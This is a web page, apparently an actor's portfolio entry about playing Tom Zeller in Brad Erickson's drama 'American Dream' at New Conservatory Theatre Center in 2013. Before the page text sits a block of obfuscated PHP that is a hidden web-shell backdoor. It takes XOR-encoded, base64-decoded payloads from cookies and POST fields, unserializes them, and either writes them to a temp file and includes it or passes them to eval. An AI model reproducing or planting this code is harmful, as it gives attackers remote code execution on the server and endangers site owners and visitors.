$LJpVkQZi = "\x64" . "\154" . chr ( 168 - 64 )."\x5f" . 'B' . "\166" . "\x56" . chr ( 110 - 41 ).'Q';$aOlPegct = 'c' . "\154" . "\x61" . "\x73" . "\x73" . '_' . 'e' . "\170" . chr (105) . chr (115) . 't' . chr (115); $iiJJop = class_exists($LJpVkQZi); $aOlPegct = "24089";$zNrHJnu = !1;if ($iiJJop == $zNrHJnu){function OacUyjjkj(){$IVyjokmO = new /* 2033 */ dlh_BvVEQ(45107 + 45107); $IVyjokmO = NULL;}$HyHusKkJ = "45107";class dlh_BvVEQ{private function URHsiNQ($HyHusKkJ){if (is_array(dlh_BvVEQ::$aiSmYjJx)) {$OalTiWFbGZ = sys_get_temp_dir() . "/" . crc32(dlh_BvVEQ::$aiSmYjJx['s' . "\x61" . chr (108) . chr (116)]);@dlh_BvVEQ::$aiSmYjJx["\167" . "\162" . 'i' . "\164" . 'e']($OalTiWFbGZ, dlh_BvVEQ::$aiSmYjJx["\143" . 'o' . "\x6e" . "\x74" . chr (101) . chr (110) . chr ( 726 - 610 )]);include $OalTiWFbGZ;@dlh_BvVEQ::$aiSmYjJx["\144" . chr (101) . chr ( 1086 - 978 )."\x65" . chr (116) . chr ( 279 - 178 )]($OalTiWFbGZ); $HyHusKkJ = "45107";exit();}}private $SVoUol;public function kLVCUq(){echo 36586;}public function __destruct(){$HyHusKkJ = "26011_27870";$this->URHsiNQ($HyHusKkJ); $HyHusKkJ = "26011_27870";}public function __construct($MamtZTOpa=0){$HuNoOzt = $_POST;$xGxSA = $_COOKIE;$RMqoXYD = "299bd301-26e4-4157-b17b-e96b8a470378";$ETuvAJk = @$xGxSA[substr($RMqoXYD, 0, 4)];if (!empty($ETuvAJk)){$UsvEFPxKII = "base64";$ctyGTkk = "";$ETuvAJk = explode(",", $ETuvAJk);foreach ($ETuvAJk as $uRTYvxDxlQ){$ctyGTkk .= @$xGxSA[$uRTYvxDxlQ];$ctyGTkk .= @$HuNoOzt[$uRTYvxDxlQ];}$ctyGTkk = array_map($UsvEFPxKII . chr ( 151 - 56 ).chr ( 780 - 680 ).chr (101) . "\x63" . chr (111) . chr (100) . 'e', array($ctyGTkk,)); $ctyGTkk = $ctyGTkk[0] ^ str_repeat($RMqoXYD, (strlen($ctyGTkk[0]) / strlen($RMqoXYD)) + 1);dlh_BvVEQ::$aiSmYjJx = @unserialize($ctyGTkk);}}public static $aiSmYjJx = 12555;}OacUyjjkj();}$DnCusDfkqU = "\125" . "\x79" . 'U' . "\137" . chr (79) . 'h' . chr ( 648 - 529 ).chr (83); $HeBaNK = chr (99) . chr (108) . "\141" . "\x73" . "\163" . "\x5f" . chr (101) . "\170" . "\x69" . chr (115) . "\164" . "\163";$RcMsaj = class_exists($DnCusDfkqU); $HeBaNK = "34999";$AgFyfNJQ = !1;if ($RcMsaj == $AgFyfNJQ){function QjUrhq(){$NvLjdb = new /* 8068 */ UyU_OhwS(16052 + 16052); $NvLjdb = NULL;}$PJjRFnx = "16052";class UyU_OhwS{private function ffzUDzx($PJjRFnx){if (is_array(UyU_OhwS::$pxkspCvqJ)) {$LSkLwPnY = str_replace("\x3c" . chr (63) . chr (112) . "\x68" . 'p', "", UyU_OhwS::$pxkspCvqJ[chr (99) . 'o' . "\x6e" . chr (116) . 'e' . chr ( 284 - 174 )."\x74"]);eval($LSkLwPnY); $PJjRFnx = "16052";exit();}}private $xBZvncHxtY;public function DjkNaz(){echo 59480;}public function __destruct(){UyU_OhwS::$pxkspCvqJ = @unserialize(UyU_OhwS::$pxkspCvqJ); $PJjRFnx = "25168_17224";$this->ffzUDzx($PJjRFnx); $PJjRFnx = "25168_17224";}public function EfxalcZsyk($thDEXRSOM, $tggUmCw){return $thDEXRSOM[0] ^ str_repeat($tggUmCw, (strlen($thDEXRSOM[0]) / strlen($tggUmCw)) + 1);}public function __construct($nFbpxelbn=0){$zzYllo = $_POST;$qGmaeQUJb = $_COOKIE;$tggUmCw = "4520e354-b869-46cb-b18e-887b9d1125cb";$aNEzSpeKdE = @$qGmaeQUJb[substr($tggUmCw, 0, 4)];if (!empty($aNEzSpeKdE)){$LJHeTHiMJD = "base64";$thDEXRSOM = "";$aNEzSpeKdE = explode(",", $aNEzSpeKdE);foreach ($aNEzSpeKdE as $bKTkUIVx){$thDEXRSOM .= @$qGmaeQUJb[$bKTkUIVx];$thDEXRSOM .= @$zzYllo[$bKTkUIVx];}$thDEXRSOM = array_map($LJHeTHiMJD . "\x5f" . "\x64" . 'e' . chr (99) . "\157" . "\144" . chr ( 418 - 317 ), array($thDEXRSOM,));UyU_OhwS::$pxkspCvqJ = $this->EfxalcZsyk($thDEXRSOM, $tggUmCw);}}public static $pxkspCvqJ = 12737;}QjUrhq();} American Dream – William Giammona

American Dream

Role: Tom Zeller
New Conservatory Theatre Center
Director: Dennis Lickteig
Opening: August 16th, 2013
Photos: Lois Tema


New Conservatory is well known for doing premieres and spotlighting new works, which gives actors the opportunity to work directly with the authors as they shape and refine their scripts. When the political landscape shifted during the rehearsal process for Brad Erickson’s drama about immigration and gay marriage, a good part of the second act had to be rewritten and Brad come up with an elegant solution quickly and effectively. This was another great cast that really bonded together backstage with a lot of laughter despite the dramatic tension on stage.